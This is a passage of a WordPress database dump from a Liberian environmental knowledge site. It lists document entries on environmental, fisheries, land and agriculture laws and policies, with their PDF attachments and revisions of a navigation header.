Guidelines','','publish','closed','closed','','environmental-impact-assessment-procedural-guidelines','','','2022-12-06 10:41:51','2022-12-06 10:41:51','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1718',172,'document','',0),(1719,1,'2019-11-10 21:26:37','2019-11-10 21:26:37','','2006-01-01-guidelines-–-2006-–-environmental-impact-assessment-procedural-guideline-liberia-abstract-ext-en','','inherit','open','closed','','2006-01-01-guidelines-2006-environmental-impact-assessment-procedural-guideline-liberia-abstract-ext-en','','','2019-11-10 21:26:37','2019-11-10 21:26:37','',1718,'https://ekmsliberia.info/wp-content/uploads/2019/11/2006-01-01-guidelines-–-2006-–-environmental-impact-assessment-procedural-guideline-liberia-abstract-ext-en.pdf',0,'attachment','application/pdf',0),(1720,1,'2019-11-10 21:35:49','2019-11-10 21:35:49','This is the FDA Regulation No. 113-08, Regulations on Environmental Impact Assessment.','Regulations on Environmental Impact Assessment','','publish','closed','closed','','regulations-on-environmental-impact-assessment','','','2022-12-06 10:41:27','2022-12-06 10:41:27','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1720',171,'document','',0),(1721,1,'2019-11-10 21:34:00','2019-11-10 21:34:00','','2009-01-01-regulation-–-2009-regulation-on-environmental-impact-assessment-–-liberia-ext-en','','inherit','open','closed','','2009-01-01-regulation-2009-regulation-on-environmental-impact-assessment-liberia-ext-en','','','2019-11-10 21:34:00','2019-11-10 21:34:00','',1720,'https://ekmsliberia.info/wp-content/uploads/2019/11/2009-01-01-regulation-–-2009-regulation-on-environmental-impact-assessment-–-liberia-ext-en.pdf',0,'attachment','application/pdf',0),(1722,1,'2019-11-10 21:41:33','2019-11-10 21:41:33','An Act to establish a legal framework for the sustainable development, management and\r\nprotection of the environment by the Environment Protection Agency in partnership with\r\nregulated Ministries and organizations and in a close and responsive relationship with the\r\npeople of Liberia; and to provide high quality information and advice on the state of the\r\nenvironment and for matters connected therewith.\r\n\r\nWHEREAS Article 9 of Chapter II of the 1986 Constitution of Liberia also encourages bilateral and regional co-operation and Liberian is party of treaty law and is a member of international and regional organizations for the attainment of the global protection of the environment and the promotion of sustainable use of natural resources;\r\n\r\nAND WHEREAS it is acknowledged that Liberia\'s biodiversity plays a crucial role in\r\nmaintaining global ecological cycles;\r\n\r\nAND WHEREAS it is desirable to provide a legal framework for the protection and management\r\nof Liberia\'s environment, its cooperation with other countries and membership in relevant\r\ninternational organizations;','Environment Protection and Management Law of the Republic of Liberia','','publish','closed','closed','','environment-protection-and-management-law-of-the-republic-of-liberia','','','2022-12-06 10:44:01','2022-12-06 10:44:01','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1722',170,'document','',0),(1723,1,'2019-11-10 21:40:36','2019-11-10 21:40:36','','ENVIRONMENT PROTECTION AND MANAGEMENT LAW LIBERIA','','inherit','open','closed','','environment-protection-and-management-law-liberia','','','2019-11-10 21:40:36','2019-11-10 21:40:36','',1722,'https://ekmsliberia.info/wp-content/uploads/2019/11/ENVIRONMENT-PROTECTION-AND-MANAGEMENT-LAW-LIBERIA.pdf',0,'attachment','application/pdf',0),(1724,1,'2019-11-10 21:53:44','2019-11-10 21:53:44','Liberia\'s fisheries resources are a national asset and part of our heritage therefore it is our responsibility to manage and develop them for the benefit of the country as a whole, especially for those communities upon which their livelihoods depend. If we are able to achieve this, fish has the potential to make a significant contribution to the social and economic development and wellbeing of our nation. Implementing this policy and strategy is a\r\nmajor step that we take together to achieve this vision.\r\n\r\nAs I look back over the years I see that we have achieved some milestones, particularly in the area of overcoming illegal fishing in our Fisheries Waters. Liberia, a few years ago, was subjected to an annual loss of over US$12.0 million through illegal fishing. This loss has recently significantly minimized, as a result of our relentless struggle in confronting illegal fishing, and bringing perpetrators to account. The fish resources that used to be stolen are now available for our small-scale fishers or foreign vessels that pay for the rights to fish.\r\n\r\nThese positive steps provide us with great hope for the future – a future that within this policy has been underpinned by Article 7 of the Constitution of the Republic of Liberia.\r\nThe fisheries and aquaculture policy sets out objectives for us to strengthen community stewardship of fishery resources and to support the development of up-and-down stream commercial activities. It promotes the development of sustainable aquaculture for subsistence and commercial purposes to provide more fish for food and jobs. In our industrial fisheries, we will tread with caution and establish a just rights allocation system to encourage economically viable, efficient and sustainable fisheries.\r\n\r\nThe policy recognizes the safety net that fisheries provide for our poorest people. I am abundantly aware that at a time when climate change is upon us, we need to improve the resilience of our most vulnerable people to change. However, we must also be mindful that the social and economic benefits derived from the sector are dependent on long-term ecological sustainability, so we need to implement strategies that encourage responsible use of the ecosystem.\r\n\r\nThis policy has been developed based on home grown practical experiences, captured through country-wide consultations, and best practice examples drawn from international experiences. This blend of experience and knowledge, if implemented in the spirit of our guiding principles – equity, sustainability, transparency, optimality, and inclusiveness – will provide us with the pathway to prosperity.','Fisheries and Aquaculture Sector Policy and Strategy','','publish','closed','closed','','fisheries-and-aquaculture-sector-policy-and-strategy','','','2022-12-06 10:43:36','2022-12-06 10:43:36','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1724',169,'document','',0),(1725,1,'2019-11-10 21:48:32','2019-11-10 21:48:32','','fisheries_policy_doc','','inherit','open','closed','','fisheries_policy_doc','','','2019-11-10 21:48:32','2019-11-10 21:48:32','',1724,'https://ekmsliberia.info/wp-content/uploads/2019/11/fisheries_policy_doc.pdf',0,'attachment','application/pdf',0),(1726,1,'2019-11-10 21:59:59','2019-11-10 21:59:59','A new regulation for the Marine Fisheries Sector in the Republic of Liberia.\r\n\r\nRegulations made by the Minister of Agriculture in the exercise of the powers conferred upon the office by section 105 of Chapter 4, Sub-chapter C of Title 24 of the Laws of The Republic of Liberia (the Natural Resources Law, 1958) and approved as required by such Law and having effect from this 1st day of October A.D. 2010.','The New Fisheries Regulations','','publish','closed','closed','','the-new-fisheries-regulations','','','2022-12-06 10:43:11','2022-12-06 10:43:11','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1726',168,'document','',0),(1727,1,'2019-11-10 21:58:45','2019-11-10 21:58:45','','Fisheries_Regulation_2010','','inherit','open','closed','','fisheries_regulation_2010','','','2019-11-10 21:58:45','2019-11-10 21:58:45','',1726,'https://ekmsliberia.info/wp-content/uploads/2019/11/Fisheries_Regulation_2010.pdf',0,'attachment','application/pdf',0),(1728,1,'2019-11-10 22:19:43','2019-11-10 22:19:43','This is an act to amend Title 12, Executive law of the Liberian Code of law revised and to add thereto a New Chapter creating the Liberia Land Authority.','The Liberia Land Authority Act','','publish','closed','closed','','the-liberia-land-authority-act','','','2022-12-06 10:53:54','2022-12-06 10:53:54','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1728',167,'document','',0),(1729,1,'2019-11-10 22:17:48','2019-11-10 22:17:48','','Land_Authority_Act_2016','','inherit','open','closed','','land_authority_act_2016','','','2019-11-10 22:17:48','2019-11-10 22:17:48','',1728,'https://ekmsliberia.info/wp-content/uploads/2019/11/Land_Authority_Act_2016.pdf',0,'attachment','application/pdf',0),(1730,1,'2019-11-10 22:22:32','2019-11-10 22:22:32','This Land Rights Policy concerns four land rights categories (Public Land, Government Land, Customary Land, and Private Land), and a cross-cutting sub-category called Protected Areas, which must be conserved for the benefit of all Liberians. For Public Land and Government Land, the Policy sets forth critical policy recommendations regarding: how the Government transfers such land, and how the Government acquires land, especially through the exercise of eminent domain (i.e. forced acquisition). With respect to the new category of Customary Land, there are several significant recommendations: Customary Land and Private Land are equally protected; and communities will self-define, be issued a deed, establish a legal entity, and strengthen their governance arrangements to make them fully representative and accountable. The Government also undertakes to support communities in implementing these recommendations. Finally, several Private Land issues are detailed, which include loss of ownership, leases, easements, and adverse possession.','Land Rights Policy','','publish','closed','closed','','liberia-rights-policy','','','2022-12-06 10:53:35','2022-12-06 10:53:35','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1730',166,'document','',0),(1731,1,'2019-11-10 22:21:17','2019-11-10 22:21:17','','Land_Rights_Policy (1)','','inherit','open','closed','','land_rights_policy-1','','','2019-11-10 22:21:17','2019-11-10 22:21:17','',1730,'https://ekmsliberia.info/wp-content/uploads/2019/11/Land_Rights_Policy-1.pdf',0,'attachment','application/pdf',0),(1732,1,'2019-11-10 22:28:12','2019-11-10 22:28:12','The main purpose of this report is to propose an infrastructure planning strategy for Liberia that contributes to national and regional integration in a manner that secures peace and stability for the long term future. It specifically aims at formulating an investment approach that is explicitly cognizant of Liberia’s status as a fragile state so as to promote inclusive growth and avoid a recurrence of conflict in the future, as well as enabling Liberia to deepen its links with MRU and ECOWAS neighbors, thereby enhancing the development benefits which can accrue from regional integration.\r\n\r\nThe study examines and is built around three major themes: (i) stability, (ii) regional integration, and (iii) the infrastructure gaps in Liberia. The issue of stability is a central concern that takes into account the extent of human harm and physical damage which the nation suffered during its fourteen years conflict. This theme informs the choice of growth strategies that will foster an era of inclusive and transformational growth. The report assesses the drivers of the original conflict and the vulnerabilities which remain as a basis for prioritizing infrastructure investment that delivers the inclusive growth which Liberia now requires.','Liberia: Infrastructure and Inclusive Growth','','publish','closed','closed','','liberia-infrastructure-and-inclusive-growth','','','2022-12-06 10:53:15','2022-12-06 10:53:15','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1732',165,'document','',0),(1733,1,'2019-11-10 22:26:35','2019-11-10 22:26:35','','Liberia_-_Infrastructure_and_Inclusive_Growth_-_Full_Report','','inherit','open','closed','','liberia_-_infrastructure_and_inclusive_growth_-_full_report','','','2019-11-10 22:26:35','2019-11-10 22:26:35','',1732,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia_-_Infrastructure_and_Inclusive_Growth_-_Full_Report.pdf',0,'attachment','application/pdf',0),(1734,1,'2019-11-10 22:44:22','2019-11-10 22:44:22','This section of the report is an abbreviated version of the records of the county consultative meetings held between March and April 2010. It provides information on the Land Commission, the consultative meetings, the views of participants on land issues, the key recommendations and their linkage to the program areas of the Land Commission.\r\n\r\nThe Land Commission (LC) was established by an Act of the National Legislature of Liberia in August 2009 and has a life span of 5 years. It is an autonomous agency that is structured with seven commissioners at the strategic apex. Each commissioner is from a different county; appointed by the President and confirmed by the Liberian Senate. In addition to the commissioners, there is a technical secretariat which provides technical and administrative support to the Commission.\r\n\r\nThe mandate of the Commission is to ‘Propose, advocate and coordinate reforms of land policy, laws and programs in Liberia’. Contrary to the widely held public view and perception, the LC does not have adjudicatory powers or an implementation role.','Land Commission Consultation Report - 2010','','publish','closed','closed','','land-commission-consultation-report-2010','','','2022-12-06 10:52:35','2022-12-06 10:52:35','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1734',164,'document','',0),(1735,1,'2019-11-10 22:33:50','2019-11-10 22:33:50','','National Transport Policy','','inherit','open','closed','','national-transport-policy','','','2019-11-10 22:33:50','2019-11-10 22:33:50','',1734,'https://ekmsliberia.info/wp-content/uploads/2019/11/National-Transport-Policy.pdf',0,'attachment','application/pdf',0),(1736,1,'2019-11-10 22:43:44','2019-11-10 22:43:44','','2010_County_Consultation_on_Land','','inherit','open','closed','','2010_county_consultation_on_land','','','2019-11-10 22:43:44','2019-11-10 22:43:44','',1734,'https://ekmsliberia.info/wp-content/uploads/2019/11/2010_County_Consultation_on_Land.pdf',0,'attachment','application/pdf',0),(1737,1,'2019-11-10 22:51:41','2019-11-10 22:51:41','AN ACT TO AMEND CHAPTER 28 OF THE EXECUTIVE LAW OF 1972, TO PROVIDE FOR THE ESTABLISHMENT OF THE LIBERIA FERTILIZER REGULATORY DIVISION, WITHIN THE MINISTRY OF AGRICULTURE','Liberia Fertilizer Regulatory Division Act','','publish','closed','closed','','liberia-fertilizer-regulatory-division-act','','','2022-12-06 10:52:15','2022-12-06 10:52:15','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1737',163,'document','',0),(1738,1,'2019-11-10 22:49:46','2019-11-10 22:49:46','','2016 Liberia Draft Fertilizer Regulation I','','inherit','open','closed','','2016-liberia-draft-fertilizer-regulation-i','','','2019-11-10 22:49:46','2019-11-10 22:49:46','',1737,'https://ekmsliberia.info/wp-content/uploads/2019/11/2016-Liberia-Draft-Fertilizer-Regulation-I.pdf',0,'attachment','application/pdf',0),(1739,1,'2019-11-10 22:55:26','2019-11-10 22:55:26','AN ACT TO AMEND CHAPTER 28 OF THE EXECUTIVE LAW OF 1972, TO PROVIDE FOR THE ESTABLISHMENT OF LIBERIA PLANT PROTECTION REGULATORY SERVICES BUREAU WITHIN THE MINISTRY OF AGRICULTURE','Liberia Plant Protection Regulatory Services Act','','publish','closed','closed','','liberia-plant-protection-regulatory-services-act','','','2022-12-06 10:51:56','2022-12-06 10:51:56','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1739',162,'document','',0),(1740,1,'2019-11-10 22:54:48','2019-11-10 22:54:48','','2016 Liberia Plant Protection Regulatory Services Bureau','','inherit','open','closed','','2016-liberia-plant-protection-regulatory-services-bureau','','','2019-11-10 22:54:48','2019-11-10 22:54:48','',1739,'https://ekmsliberia.info/wp-content/uploads/2019/11/2016-Liberia-Plant-Protection-Regulatory-Services-Bureau.pdf',0,'attachment','application/pdf',0),(1741,1,'2019-11-10 22:58:51','2019-11-10 22:58:51','This Act is cited as The Liberia Seed Development and Certification Agency Act','Liberia Seed Development and Certification Agency Act','','publish','closed','closed','','liberia-seed-development-and-certification-agency-act','','','2022-12-06 10:51:31','2022-12-06 10:51:31','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1741',161,'document','',0),(1742,1,'2019-11-10 22:58:20','2019-11-10 22:58:20','','2016 Liberia Seed Regulation I','','inherit','open','closed','','2016-liberia-seed-regulation-i','','','2019-11-10 22:58:20','2019-11-10 22:58:20','',1741,'https://ekmsliberia.info/wp-content/uploads/2019/11/2016-Liberia-Seed-Regulation-I.pdf',0,'attachment','application/pdf',0),(1743,1,'2019-11-10 23:15:36','2019-11-10 23:15:36','Liberia’s climate is favorable for farming, it has vast forests and an abundance of water, all of which provide a basis for increased agricultural development, as well as manufacturing\r\nand processing of its own produce. Agriculture is a major sector of Liberia’s economy, worth 38.8% of GDP, employs 67% of the workforce, and provides valuable export opportunities.\r\n\r\nThe country has re-calibrated its economic policy to one of Economic Diversification and Inclusive Growth through Agriculture, Agro-Processing and Manufacturing. The new\r\neconomic policy, “Liberia Agricultural Transformation Agenda (LATA),” adapts an export-driven approach and focuses on six agro-clusters, or sectors, moving away from raw commodities to manufacturing and processing of priority value chains — cocoa, rubber, oil palm, fisheries &amp; aquaculture, rice and cassava.','Liberia: Invest Agriculture','','publish','closed','closed','','liberia-invest-agriculture','','','2022-12-06 10:50:10','2022-12-06 10:50:10','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1743',160,'document','',0),(1744,1,'2019-11-10 23:14:05','2019-11-10 23:14:05','','Agricultural Sector','','inherit','open','closed','','agricultural-sector','','','2019-11-10 23:14:05','2019-11-10 23:14:05','',1743,'https://ekmsliberia.info/wp-content/uploads/2019/11/Agricultural-Sector.pdf',0,'attachment','application/pdf',0),(1745,1,'2019-11-10 23:23:57','2019-11-10 23:23:57','Improving access to food through broad-based participation in income-generating activities in key agricultural supply chains, together with the development of safety nets that protect the welfare of Liberia’s diverse types of vulnerable individuals and households represent two of the major food security challenges facing the Liberian government after fourteen years of civil conflict. Responding to these challenges will depend largely on how the government responds to five major challenges in transitioning from an emergency situation to one focused on long-term development: 1) resettling IDPs and reintegrating ex-combatants; 2) reducing the real cost of food; 3) improving macroeconomic management and governance; 4) generating broad-based growth in rural incomes through smallholder development; and 5) developing public sector capacity to analyze, plan, prioritize, coordinate and monitor policies and programs. Success in addressing these issues may depend largely on the ability to go beyond strictly technical responses to develop innovative actions that take into account the numerous and complex socio-political factors existing in the country in the post-conflict period.','Agricultural policy and food security in Liberia','','publish','closed','closed','','agricultural-policy-and-food-security-in-liberia','','','2022-12-06 10:49:51','2022-12-06 10:49:51','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1745',159,'document','',0),(1746,1,'2019-11-10 23:22:27','2019-11-10 23:22:27','','Agriculture Policy','','inherit','open','closed','','agriculture-policy','','','2019-11-10 23:22:27','2019-11-10 23:22:27','',1745,'https://ekmsliberia.info/wp-content/uploads/2019/11/Agriculture-Policy.pdf',0,'attachment','application/pdf',0),(1747,1,'2019-11-10 23:30:53','2019-11-10 23:30:53','This is a SWOT Analysis of Liberia’s Natural Resources Management Environmental Policy Framework','A SWOT Analysis of Liberia’s Natural Resources Management Environmental Policy Framework','','publish','closed','closed','','https-ekmsliberia-info-wp-content-uploads-2019-11-analysis-of-liberia-environmental-policy-framework-2-pdf','','','2021-08-23 09:59:23','2021-08-23 09:59:23','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1747',158,'document','',0),(1748,1,'2019-11-10 23:29:56','2019-11-10 23:29:56','','Analysis of Liberia Environmental Policy Framework','','inherit','open','closed','','analysis-of-liberia-environmental-policy-framework','','','2019-11-10 23:29:56','2019-11-10 23:29:56','',1747,'https://ekmsliberia.info/wp-content/uploads/2019/11/Analysis-of-Liberia-Environmental-Policy-Framework.pdf',0,'attachment','application/pdf',0),(1749,1,'2019-11-10 23:41:53','2019-11-10 23:41:53','This publication is a summary of several larger reports, which were produced by ASM-PACE in collaboration with the Program on Forests (PROFOR) and the World Bank. ASM-PACE is a multi-partner program that began as a partnership between Estelle Levin Limited and World Wide Fund for Nature (also known as the World Wildlife Fund) to address the environmental impacts of artisanal and small-scale mining (ASM) in some of the world’s most important ecosystems, particularly protected areas and critical ecosystems (PACE).\r\n\r\nWith support from PROFOR and the Oil, Gas, and Mining Unit (SEGOM), the World Bank’s Africa regional staff contracted the ASM-PACE Program to analyze the impacts of artisanal mining activities on high-value natural landscapes and the people who live nearby. The case studies, a global solutions study, and a methodological toolkit offer recommendations on how to reconcile socioeconomic development based on artisanal mining and preservation of important ecological sites. The global study looked at 36 countries and found that artisanal and small-scale mining was taking place either inside or along the borders of 96 out of 147 protected areas in those countries. In the end, the project looked in more depth at experiences in five African countries. This report focuses on three of these: Gabon, Liberia, and Madagascar.','Artisanal Mining in Critical Ecosystems: a look at Gabon, Liberia, and Madagascar','','publish','closed','closed','','artisanal-mining-in-critical-ecosystems-a-look-at-gabon-liberia-and-madagascar','','','2022-12-06 10:49:29','2022-12-06 10:49:29','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1749',157,'document','',0),(1750,1,'2019-11-10 23:39:24','2019-11-10 23:39:24','','ASM-brochure','','inherit','open','closed','','asm-brochure','','','2019-11-10 23:39:24','2019-11-10 23:39:24','',1749,'https://ekmsliberia.info/wp-content/uploads/2019/11/ASM-brochure.pdf',0,'attachment','application/pdf',0),(1751,1,'2019-11-10 23:47:18','2019-11-10 23:47:18','At the request of the Environmental Protection Agency of Liberia (EPA), UNEP conducted a technical mission to study both the technical and institutional issues associated with solid waste management in Liberia. The mission was hosted by the EPA and undertaken between 17– 27 June 2007. This report summarizes its findings.\r\n\r\nThe primary task of this exercise was to undertake, in consultation with the EPA, a review of the Solid Waste Management Sector of Liberia.','Assessment of Solid Waste Management in Liberia','','publish','closed','closed','','assessment-of-solid-waste-management-in-liberia','','','2022-12-06 10:49:10','2022-12-06 10:49:10','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1751',156,'document','',0),(1752,1,'2019-11-10 23:46:42','2019-11-10 23:46:42','','assessment of solid waste in Liberia','','inherit','open','closed','','assessment-of-solid-waste-in-liberia','','','2019-11-10 23:46:42','2019-11-10 23:46:42','',1751,'https://ekmsliberia.info/wp-content/uploads/2019/11/assessment-of-solid-waste-in-Liberia.pdf',0,'attachment','application/pdf',0),(1753,1,'2019-11-10 23:50:36','2019-11-10 23:50:36','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Related Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li id=\"menu-item-119\"><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a href=\"#\">Media </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-122\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li id=\"menu-item-128\"><a href=\"#\">Bulletin </a>\n<ul>\n	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Related Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-10 23:50:36','2019-11-10 23:50:36','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(1754,1,'2019-11-10 23:59:55','2019-11-10 23:59:55','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Related Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li id=\"menu-item-119\"><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a href=\"#\">Media </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-122\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li id=\"menu-item-128\"><a href=\"#\">Bulletin </a>\n<ul>\n	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Related Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-10 23:59:55','2019-11-10 23:59:55','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(1755,1,'2019-11-11 00:00:31','2019-11-11 00:00:31','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Related Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li id=\"menu-item-119\"><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a href=\"#\">Media </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-122\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li id=\"menu-item-128\"><a href=\"#\">Bulletin </a>\n<ul>\n	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li id=\"menu-item-121\"><a 